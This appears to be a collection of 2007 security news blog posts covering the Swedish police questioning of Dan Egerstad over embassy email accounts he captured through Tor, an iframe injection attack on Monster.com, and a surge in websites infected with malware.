There’s a really interesting story making the round today about the arrest of Dan Egerstad, a Swedish security consultant who claims to have compromised a private data network used by embassies around the world earlier this year. Swedish police apparently braced Egerstad outside his apartment yesterday, confiscated a bunch of his PCs and other hardware [...]
There’s a really interesting story making the round today about the arrest of Dan Egerstad, a Swedish security consultant who claims to have compromised a private data network used by embassies around the world earlier this year. Swedish police apparently braced Egerstad outside his apartment yesterday, confiscated a bunch of his PCs and other hardware and dragged him in for two hours of questioning. In a story in the Sydney Morning Herald newspaper, Egerstad says that “the police ‘played every trick in the book, good cop, bad cop and crazy mysterious guy in the corner not wanting to tell his name and just staring at me. Well, if they want to try to manipulate, I can play that game too. [I] gave every known body signal there is telling of lies … covered my mouth, scratched my elbow, looked away and so on.’”
What’s really interesting about this is that even though Egerstad’s exploits were widely publicized and he went so far as to post on his web site account information for some of the unsecured email accounts he found, the police let him walk without even charging him. Egerstad has claimed all along that didn’t break any laws and got the account information by installing Tor on a few servers and monitoring the traffic. But the Swedish police apparently weren’t buying that and felt they had enough evidence to impound his computers and subject him to several hours of questioning. It could have been a simple fishing expedition on their part, but Egerstad should probably count himself very lucky that he’s a Swede. Had he been living in Germany or the UK or even the U.S. when he pulled his stunt, he likely would still be sitting in an interrogation room drinking warm Fresca.
The other interesting note here is that Egerstad now says he thinks the people sending the messages from the email accounts he was monitoring were not the accounts’ owners, but hackers who had compromised them and were using Tor to hide their activities. I’m not sure that helps his case at all, but it’s a good indication that these embassies, NGOs and other organizations need to take a look around their networks and see what’s happening.
Monster.com hacked again
These continue to be risky times for those using Monster.com to search for jobs. You might remember that hackers targeted Monster.com with a massive phishing attack last August, stealing at least 1.6 million bank account records in the process. Now comes word that the bad guys nailed the site with an iframe injection attack Monday. Roger [...]
These continue to be risky times for those using Monster.com to search for jobs. You might remember that hackers targeted Monster.com with a massive phishing attack last August, stealing at least 1.6 million bank account records in the process. Now comes word that the bad guys nailed the site with an iframe injection attack Monday.
Roger Thompson, CTO at Exploit Prevention Labs, blogged that multiple brands appeared to be affected, including Eddie Bauer, GMAC Mortgage, BestBuy, Toyota Financial, and Tricounties Bank.
“It is … not clear how many pages were affected, but it is likely that the attack was the same for all companies on the Web site, which might turn out to be a pretty good set of Fortune 500 [companies],” he wrote, adding that his lab detected the attack as something cooked up using the Neosploit exploit package. “It is fairly well encrypted,” he said.
Fortunately, he said, Monster caught on quickly and yanked the affected pages down.
Websites Hosting Malware Increases to 66,000 & Still Rising
In November 2007, Websites infected with malware increased to a staggering number of 66,000 and they continue to add, although most anti-virus solutions are capable of detecting the malicious programs. A major source of all these applications has been the malicious yl18.net script. There has also been a doubling of the number of Websites that the script has infected, says SANS Internet Storm Institute's Mark Hofman. Ars Technica reported this on November 12, 2007.
Hofman further thinks that the script is the same malware that emerged from the infection in the Super Bowl in early 2007 and struck nearly 200,000 Websites. After a bit of research, Hofman discovered that the February infection shot out from several of the same computer servers that are operating this time too, including Zj5173.com and 137wg.com. The February malicious script used the SQL injecting method to hack and change site contents and compel visitors to download executable files. SANS has observed the same style of activity this time too.
Attacks launched in two stages and use concealed iframe code to deface Websites and then lead visitors to malware-hosting Websites where their computers get infected have become too common. MPack, the malware developing tool, often applies this technique. In April this year (2007), a security company reported that the Website of ASUS (that makes motherboards) allowed the presence of an iframe code on its pages that exploited vulnerability in Microsoft Windows' manner of using animated cursors to drop infectious malware on victims' computers.
The iframe attack seems to have a connection with Chinese servers, according to the SANS Institute. These servers frequently allow the launch of attacks on government as well as consumer PCs. Not only the small sites but the larger ones too have been vulnerable to malware. Recently, the Indian news site, IndiaTimes, started to download malware on its visitors' computers, Mary Landesman, Security Researcher at ScanSafe wrote on the firm's blog. Ars Technica reported this on November 12, 2007.
The selection of old vulnerabilities suggests that attacks may have been carried out with the Metasploit Framework. Exploiting it successfully leads to massive malware downloads, Landesman added.
